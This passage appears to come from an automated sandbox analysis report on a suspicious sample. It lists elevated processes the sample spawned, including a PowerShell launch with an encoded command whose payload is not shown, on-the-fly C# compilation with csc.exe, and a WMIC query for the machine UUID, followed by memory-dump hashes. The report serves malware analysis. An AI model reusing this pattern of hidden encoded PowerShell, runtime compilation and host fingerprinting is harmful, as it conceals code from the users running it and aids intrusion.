Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 6
Start time: 02:59:24
Start date: 02/01/2025
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD9CB.tmp" "c:\Users\user\AppData\Local\Temp\at4aznwk\CSC4E83F948CA91455DAC7F3163ADDBB8D.TMP"
Imagebase: 0x7ff7f03f0000
File size: 52'744 bytes
MD5 hash: C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 02:59:26
Start date: 02/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded 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
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 02:59:27
Start date: 02/01/2025
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.cmdline"
Imagebase: 0x7ff7b0010000
File size: 2'759'232 bytes
MD5 hash: F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 9
Start time: 02:59:27
Start date: 02/01/2025
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE63E.tmp" "c:\Users\user\AppData\Local\Temp\f2b3v2t5\CSCCC5958D27FB74F62AE119AE083742021.TMP"
Imagebase: 0x7ff7f03f0000
File size: 52'744 bytes
MD5 hash: C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 02:59:36
Start date: 02/01/2025
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: "wmic" csproduct get uuid /value
Imagebase: 0x7ff77a3b0000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 3.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 3
Total number of Limit Nodes: 0
(execution graph rendering omitted; its 3 nodes are 7ff848e8b124 -> 7ff848e8b12d (LoadLibraryExW) -> 7ff848e8b1dd)

Control-flow Graph
(graph rendering omitted; function starting at 7ff848e859c4, entry block 7ff848e859c4-7ff848e85a07 calling 7ff848e84008)
Memory Dump Source
• Source File: 00000003.00000002.2266698059.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff848e80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d9b51a38a6e9c3ede1644f7aa4f7b7f39345c78dff2ade02758a3b9b94b1153c
• Instruction ID: 9b32d0fcccaac0d57570968295d6e2c841440d83d9f73164dc61e6cd0ecef182
• Opcode Fuzzy Hash: d9b51a38a6e9c3ede1644f7aa4f7b7f39345c78dff2ade02758a3b9b94b1153c
• Instruction Fuzzy Hash: D7E10331E1C65A8FE768AB28848527E77C1FF45390F94117DE88EC71D2DF38A842874A

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000003.00000002.2266698059.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff848e80000_powershell.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 1f5799455dd40015271e27f8d316fa20a1d4739346ba051f9ee67e8ca5beac3e
• Instruction ID: ead4bf781516eb34a88a1589ed5d537b534d0cb145563a64bdfd2019768ab78f
• Opcode Fuzzy Hash: 1f5799455dd40015271e27f8d316fa20a1d4739346ba051f9ee67e8ca5beac3e
• Instruction Fuzzy Hash: 9231C43190CA5C9FDB59DF689849AE9BBE0FF55321F04822FD009C3252DB74A855CB91

Control-flow Graph
(graph rendering omitted; function starting at 7ff848f553b5, entry block 7ff848f553b5-7ff848f55444)
Memory Dump Source
• Source File: 00000003.00000002.2267376018.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff848f50000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2edfd4e44dba5fc345de778e0572c1e0475178b0ff07ad2de80ab305d80081f4
• Instruction ID: fd2cc32bb0ae23915dc4818d90b9442a997a22d6ebc6d4c1caa913d297c597af
• Opcode Fuzzy Hash: 2edfd4e44dba5fc345de778e0572c1e0475178b0ff07ad2de80ab305d80081f4
• Instruction Fuzzy Hash: 9FD16731E1EAC95FE795AB2898555B6BBE1FF1A3A4F0800FAD04DC70D3EA18AC05C355

Control-flow Graph
(graph rendering omitted; function starting at 7ff848f52aad, entry block 7ff848f52aad-7ff848f52ade)
Memory Dump Source
• Source File: 00000003.00000002.2267376018.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff848f50000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 73bab693c9d1c6ef4056b2574e6bdbcdc99e5403d4adf62c4e9a3baaffb8236b
• Instruction ID: 0131a395d140d96b53ef27fe8c0d1fbea5fbcd4ca90af3bde17d44cbdf591bf6
• Opcode Fuzzy Hash: 73bab693c9d1c6ef4056b2574e6bdbcdc99e5403d4adf62c4e9a3baaffb8236b
• Instruction Fuzzy Hash: F0813821A0EBC65FE35AA77C18661B5BFE1EF56160F0C06FBC089C71E3DA185846C356
Strings
Memory Dump Source
• Source File: 00000003.00000002.2266698059.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff848e80000_powershell.jbxd
Similarity
• API ID:
• String ID: L
• API String ID: 0-2909332022
• Opcode ID: 7d52aa3e073154732f6a59fa232a29f5620b5bc822822dccd6e7e7316f9260cd
• Instruction ID: a320fc91cfafd89f81690d799f15bd911f43414a7c5d387de9ded5e54a7c2ba2
• Opcode Fuzzy Hash: 7d52aa3e073154732f6a59fa232a29f5620b5bc822822dccd6e7e7316f9260cd
                                                                                                                                                    • Instruction Fuzzy Hash: 1B42E430A1CA894FEBA8EF1888457A877E0FF55380F5441BDD84DCB292DB78E946C785
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.2266698059.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ff848e80000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: L
                                                                                                                                                    • API String ID: 0-2909332022
                                                                                                                                                    • Opcode ID: 7a47c72270bd52a25477f3daa3a200563fcbe475c3d2c7c050d2b793b3bbafc6
                                                                                                                                                    • Instruction ID: 956653ccf951665a0d484d2b750a701b90e0f2af5ce72757d1431a0ce3680b61
                                                                                                                                                    • Opcode Fuzzy Hash: 7a47c72270bd52a25477f3daa3a200563fcbe475c3d2c7c050d2b793b3bbafc6
                                                                                                                                                    • Instruction Fuzzy Hash: E012AF30A1CA4A8FEBA8EF18C845BA977E0FF58380F544179D84EC7292DF74E9458785